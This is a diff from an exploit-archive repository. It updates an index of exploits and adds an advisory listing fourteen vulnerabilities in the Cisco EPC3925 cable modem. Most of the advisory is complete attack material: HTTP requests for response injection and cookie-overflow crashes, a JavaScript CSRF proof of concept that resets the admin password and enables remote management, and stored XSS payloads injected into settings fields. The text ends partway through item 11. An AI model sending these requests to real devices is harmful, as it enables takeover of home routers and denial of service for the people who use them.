40257,platforms/windows/dos/40257.txt,"Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - Authentication Bypass (EXTRABACON)",2016-08-18,"Shadow Brokers",hardware,remote,161
|
||||
40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161
|
||||
40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
40260,platforms/cgi/webapps/40260.sh,"SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change",2016-08-18,"Todor Donev",cgi,webapps,80
|
||||
40261,platforms/cgi/webapps/40261.txt,"Honeywell IP-Camera HICC-1100PT - Credentials Disclosure",2016-08-18,"Yakir Wizman",cgi,webapps,80
|
||||
|
@ -36463,15 +36466,15 @@ id,file,description,date,author,platform,type,port
|
|||
40267,platforms/cgi/webapps/40267.txt,"MESSOA IP-Camera NIC990 - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80
|
||||
40268,platforms/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0
|
||||
40269,platforms/cgi/webapps/40269.txt,"ZYCOO IP Phone System - Remote Command Execution",2016-08-19,0x4148,cgi,webapps,0
|
||||
40270,platforms/linux/local/40270.txt,"Watchguard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)",2016-08-19,"Shadow Brokers",linux,local,0
|
||||
40271,platforms/hardware/local/40271.txt,"Cisco ASA / PIX - Privilege Escalation (EPICBANANA)",2016-08-19,"Shadow Brokers",hardware,local,0
|
||||
40272,platforms/cgi/webapps/40272.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40273,platforms/cgi/webapps/40273.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40274,platforms/cgi/webapps/40274.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL)",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR)",2016-08-19,"Shadow Brokers",hardware,remote,0
|
||||
40276,platforms/hardware/webapps/40276.txt,"Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)",2016-08-19,"Shadow Brokers",hardware,webapps,0
|
||||
40270,platforms/linux/local/40270.txt,"Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation",2016-08-19,"Shadow Brokers",linux,local,0
|
||||
40271,platforms/hardware/local/40271.txt,"Cisco ASA / PIX - 'EPICBANANA' Privilege Escalation",2016-08-19,"Shadow Brokers",hardware,local,0
|
||||
40272,platforms/cgi/webapps/40272.txt,"TOPSEC Firewalls - 'ELIGIBLECONTESTANT' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40273,platforms/cgi/webapps/40273.txt,"TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40274,platforms/cgi/webapps/40274.txt,"TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
|
||||
40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit",2016-08-19,"Shadow Brokers",hardware,remote,0
|
||||
40276,platforms/hardware/webapps/40276.txt,"Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution",2016-08-19,"Shadow Brokers",hardware,webapps,0
|
||||
40277,platforms/cgi/webapps/40277.sh,"MESSOA IP Cameras (Multiple Models) - Unauthenticated Password Change",2016-08-19,"Todor Donev",cgi,webapps,80
|
||||
40278,platforms/php/webapps/40278.txt,"tcPbX - (tcpbx_lang) Local File Inclusion",2016-08-19,0x4148,php,webapps,0
|
||||
40278,platforms/php/webapps/40278.txt,"tcPbX - 'tcpbx_lang' Local File Inclusion",2016-08-19,0x4148,php,webapps,0
|
||||
40308,platforms/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
|
||||
40282,platforms/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
|
||||
40283,platforms/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
695
platforms/asp/webapps/40383.txt
Executable file
695
platforms/asp/webapps/40383.txt
Executable file
|
@ -0,0 +1,695 @@
|
|||
# Title: Cisco EPC 3925 Multiple Vulnerabilities
|
||||
# Vendor: http://www.cisco.com/
|
||||
# Vulnerable Version(s): Cisco EPC3925 (EuroDocsis 3.0 2-PORT Voice Gateway)
|
||||
# Date: 15.09.2016
|
||||
# Author: Patryk Bogdan
|
||||
|
||||
========
|
||||
|
||||
Vulnerability list:
|
||||
1. HTTP Response Injection via 'Lang' Cookie
|
||||
2. DoS via 'Lang' Cookie
|
||||
3. DoS in Wireless Client List via 'h_sortWireless'
|
||||
4. (Un)authorized modem restart (Channel Selection)
|
||||
5. CSRF
|
||||
6. Stored XSS in SMTP Settings (Administration -> Reportning)
|
||||
7. Stored XSS in User Name #1 (e.g Administration -> Managment / Setup -> Quick Setup)
|
||||
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
|
||||
9. Stored XSS in ToD Filter (Access Restrictions -> Time of Day Rules)
|
||||
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
|
||||
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
|
||||
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
|
||||
13. Stored XSS in DDNS Settings (Setup -> DDNS)
|
||||
14. Stored XSS in Advanced VPN Setup (Security -> VPN -> Advanced Settings)
|
||||
|
||||
========
|
||||
|
||||
1. HTTP Response Injection
|
||||
|
||||
It is able to inject arbitrary data into device memory via 'Lang' cookie,
|
||||
additional data will be stored until modem restart and will be returned with every http response.
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Docsis_system HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Docsis_system.asp
|
||||
Cookie: Lang=en; SessionID=171110
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 109
|
||||
|
||||
username_login=aaa&password_login=bbb&LanguageSelect=en%0d%0aSet-Cookie: pwned&Language_Submit=0&login=Log+In
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Docsis_system.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
(...)
|
||||
|
||||
|
||||
#2 - Request:
|
||||
GET / HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Set-Cookie: Lang=en
|
||||
Set-Cookie: pwned
|
||||
Set-Cookie: SessionID=219380
|
||||
Content-Length: 1398
|
||||
(...)
|
||||
|
||||
|
||||
2. DoS via 'Lang' Cookie
|
||||
|
||||
Modem crashes when cookie variable in request is too long.
|
||||
|
||||
#1 - Request (crash via http injection):
|
||||
POST /goform/Docsis_system HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Docsis_system.asp
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 142
|
||||
|
||||
username_login=aaa&password_login=bbb&LanguageSelect=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Docsis_system.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
|
||||
#2 - Request:
|
||||
GET /Docsis_system.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Docsis_system.asp
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Set-Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
Set-Cookie: SessionID=163190
|
||||
Content-Length: 18743
|
||||
(...)
|
||||
|
||||
At this point modem crashes:
|
||||
|
||||
C:\Users\Patryk>ping -n 10 192.168.100.1
|
||||
|
||||
Pinging 192.168.100.1 with 32 bytes of data:
|
||||
Request timed out.
|
||||
Request timed out.
|
||||
Reply from 192.168.0.10: Destination host unreachable.
|
||||
Reply from 192.168.0.10: Destination host unreachable.
|
||||
Reply from 192.168.0.10: Destination host unreachable.
|
||||
Reply from 192.168.0.10: Destination host unreachable.
|
||||
(...)
|
||||
|
||||
DoS can be also executed with single HTTP request, like this:
|
||||
GET / HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: */*
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/
|
||||
Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; SessionID=163190
|
||||
Connection: close
|
||||
|
||||
|
||||
3. DoS in Wireless Client List via 'h_sortWireless'
|
||||
|
||||
Modem crashes when variable for POST parameter 'h_sortWireless' is too long.
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/WClientMACList HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/WClientMACList.asp
|
||||
Cookie: Lang=en; SessionID=71750
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 94
|
||||
|
||||
sortWireless=status&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/WClientMACList.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
( ... crash ... )
|
||||
|
||||
|
||||
4. (Un)authorized channel Selection
|
||||
|
||||
On Cisco 3925 unauthorized user can edit device channel settings and restart the modem. Such functionality should be available only for logged users, for example it's disabled on EPC 3928.
|
||||
|
||||
|
||||
5. CSRF
|
||||
|
||||
There is no prevention against CSRF attacks, attacker can for example change admin credentials and enable remote managment in single request.
|
||||
|
||||
PoC:
|
||||
<script>
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "http://192.168.100.1/goform/Administration", true);
|
||||
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
||||
xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
|
||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
||||
xhr.withCredentials = true;
|
||||
var body = "connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=admin&sysPasswd=newpass&sysConfirmPasswd=newpass&remote_management=enable&http_wanport=8080&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=enable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common";
|
||||
var aBody = new Uint8Array(body.length);
|
||||
for (var i = 0; i < aBody.length; i++)
|
||||
aBody[i] = body.charCodeAt(i);
|
||||
xhr.send(new Blob([aBody]));
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
6. Stored XSS in Administration -> Reporting
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Log HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Log.asp
|
||||
Cookie: Lang=en; SessionID=457480
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 236
|
||||
|
||||
email_enable=enable&smtp_server=%22+onmouseover%3Dalert%281%29+x%3D%22y&email_for_log=%22+onmouseover%3Dalert%282%29+x%3D%22y&SmtpUsername=%22+onmouseover%3Dalert%283%29+x%3D%22y&SmtpPassword=aaa&save=Save+Settings&h_email_enable=enable
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Log.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Log.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Log.asp
|
||||
Cookie: Lang=en; SessionID=457480
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 6454
|
||||
(...)
|
||||
<TD>
|
||||
<input type="text" name="smtp_server" maxlength="255" size="30" value="" onmouseover=alert(1) x="y" />
|
||||
</TD>
|
||||
</TR>
|
||||
<tr>
|
||||
<TD>
|
||||
<script language="javascript" type="text/javascript">dw(va_log_email3);</script>
|
||||
</TD>
|
||||
<TD>
|
||||
<input type="text" name="email_for_log" maxlength="255" size="30" value="" onmouseover=alert(2) x="y"/>
|
||||
</TD>
|
||||
</TR>
|
||||
<tr>
|
||||
<TD>
|
||||
<script language="javascript" type="text/javascript">dw(msg_smtp_username);</script>
|
||||
</TD>
|
||||
<TD>
|
||||
<input type="text" name="SmtpUsername" maxlength="255" size="30" value="" onmouseover=alert(3) x="y" />
|
||||
</TD>
|
||||
</TR>
|
||||
(...)
|
||||
|
||||
|
||||
7. Stored XSS in User Name (Administration -> Managment / Setup -> Quick Setup)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Administration HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Administration.asp
|
||||
Cookie: Lang=en; SessionID=457480
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 746
|
||||
|
||||
connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sysPasswd=aaa&sysConfirmPasswd=aaa&remote_management=disable&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=disable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Quick_setup.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Quick_setup.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Administration.asp
|
||||
Cookie: Lang=en; SessionID=457480
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 34779
|
||||
(...)
|
||||
<tr>
|
||||
<td nowrap>
|
||||
<script language="javascript" type="text/javascript">dw(va_local_access2);</script>
|
||||
</td>
|
||||
<td nowrap>
|
||||
<script>alert('XSS')</script>
|
||||
</td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
|
||||
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Rg_UserSetup HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_UserSetup.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 118
|
||||
|
||||
NewUser=user onmouseover=alert('XSS')&Btn_AddUser=Add+User&AddUser=1&UserList=Default&RemoveUser=0&UserConfigChanged=0
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Rg_UserSetup.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Rg_UserSetup.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_UserSetup.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 9706
|
||||
(...)
|
||||
<select onchange="submit();" name="UserList">
|
||||
<option value=Default >1. Default<option value=user onmouseover=alert('XSS') selected>2. user onmouseover=alert('XSS
|
||||
</select>
|
||||
(...)
|
||||
|
||||
|
||||
9. Stored XSS in ToD Filter
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Rg_TodFilter HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_TodFilter.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 189
|
||||
|
||||
TodClient=<script>alert('XSS')</script>&TodAdd=Add&addTodClient=1&ToDComputers=No+filters+entered.&removeTodClient=&StartHour=12&StartMinute=00&StartAmPm=1&EndHour=12&EndMinute=00&EndAmPm=1
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Rg_TodFilter.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Rg_TodFilter.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_TodFilter.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 9140
|
||||
(...)
|
||||
<select name="ToDComputers" onChange="submit();">
|
||||
<option value=0 selected>1. <script>alert('XSS')</script>
|
||||
</select>
|
||||
(...)
|
||||
|
||||
|
||||
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Rg_ParentalBasic HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 282
|
||||
|
||||
NewContentRule=<script>alert('XSS')</script>&AddRule=Add+Rule&AddContentRule=1&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=&AllowedDomainAction=0&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Rg_ParentalBasic.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 11126
|
||||
(...)
|
||||
<select name="ContentRules" onChange="submit();">
|
||||
<option value=0 selected>1. Default<option value=1 >2. <script>alert('XSS')</script>
|
||||
</select>
|
||||
(...)
|
||||
|
||||
|
||||
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Rg_ParentalBasic HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 318
|
||||
|
||||
NewContentRule=&AddContentRule=&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&AddAllowedDomain=Add+Allowed+Domain&AllowedDomainAction=1&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Rg_ParentalBasic.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
